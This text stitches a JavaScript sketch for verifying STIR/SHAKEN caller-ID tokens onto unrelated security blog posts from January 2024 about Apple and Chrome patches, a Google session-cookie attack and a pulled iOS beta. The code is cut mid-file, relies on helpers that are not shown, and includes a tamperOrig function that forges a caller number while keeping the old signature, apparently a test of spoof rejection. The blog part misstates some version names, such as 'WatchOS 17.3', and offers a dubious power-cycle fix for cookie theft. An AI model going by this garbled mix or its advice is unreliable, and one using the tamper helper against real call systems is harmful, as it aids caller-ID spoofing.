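function verifyPassport(token, publicKey, { callingNumber, calledNumber, now, maxAgeSec = 60 }) {
  const parts = token.split('.');
  if (parts.length !== 3) return { ok: false, reason: 'malformed' };
  let header, payload;
  try {
    header = JSON.parse(fromB64u(parts[0]));
    payload = JSON.parse(fromB64u(parts[1]));
  } catch { return { ok: false, reason: 'malformed' }; }
  if (header.alg !== 'ES256' || header.ppt !== 'shaken')
    return { ok: false, reason: 'unexpected header' };
  const valid = crypto.verify('sha256', Buffer.from(`${parts[0]}.${parts[1]}`),
    { key: publicKey, dsaEncoding: 'ieee-p1363' }, Buffer.from(parts[2], 'base64url'));
  if (!valid) return { ok: false, reason: 'bad signature' };
  if (payload.orig?.tn !== callingNumber || !payload.dest?.tn?.includes(calledNumber))
    return { ok: false, reason: 'number mismatch' };
  if (Math.abs(now - payload.iat) > maxAgeSec) return { ok: false, reason: 'stale' };
  return { ok: true, attest: payload.attest };
}

// Re-encode the payload with a different caller number, keeping the old signature.
function tamperOrig(token, newOrig) {
  const [h, p, s] = token.split('.');
  const payload = JSON.parse(fromB64u(p));
  payload.orig.tn = newOrig;
  return `${h}.${b64u(JSON.stringify(payload))}.${s}`;
}

// Constructed demo data: throwaway key, fictional 555 numbers, placeholder x5u.
const { privateKey, publicKey } = crypto.generateKeyPairSync('ec', { namedCurve: 'P-256' });
const IAT = 1707000000;
const token = signPassport(privateKey, { orig: '12025550100', dest: '12025550123',
  attest: 'A', origid: crypto.randomUUID(), iat: IAT, x5u: 'https://sti.example.invalid/cert.pem' });
```

In a real deployment the verifier fetches the certificate named in `x5u` and validates its chain before trusting the public key; that step is outside this sketch.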

Monday, January 22, 2024

Apple Updates 22-Jan-2024

 iOS 17.3, iPadOS 17.3, macOS Sonoma 14.3

The updates are large:

12.43GB for macOS

5.62GB for iPadOS

Updates for iPadOS 16.7.5, tvOS 17.3, iOS 16.7.5, Monterey 12.7.3 and higher, iOS 15.8.1

WatchOS 17.3

And Safari 17.3

0-day vulnerability in WebKit. 16 vulnerabilities.

Thursday, January 18, 2024

Very Very Large password database just released

This slide from the Cyber Security SIG presentation 18-Jan-2024.



Wednesday, January 17, 2024

Google Chrome 0-day vulnerability 17-Jan-2024

  Google released Chrome updates today. CVE-2024-0519.

Updates to Chrome browser are encouraged

Chrome version 120.0.6099.224/225 for Windows.

macOS version 120.0.6099.234

120.0.6099.224 for Linux

ChromeOS 120.0.6099.235


Friday, January 5, 2024

Google Session cookies a proposed mitigation?

 In the Cyber Security presentation 4-Jan-2024 the new attack targeting Google session cookie reuse was cited.

Session cookies, if re-validated, allow attackers to log on to Google services without re-supplying the password/authentication.

 Not Good!

A just-proposed mitigation: power cycle the device. A further step: sign out of any/all browser profiles. Even more secure: reset your passphrase and sign in again.

Wednesday, January 3, 2024

iPhone 17.3 Developer Beta 3-Jan-2024

If you are one of the few iPhone 17.3 beta testers:

A few are reporting major issues with the just released iOS 17.3 developer beta release. iPhone will loop indefinitely.

A few are reporting.

Update: Apple pulled iOS 17.3 beta due to reported problems.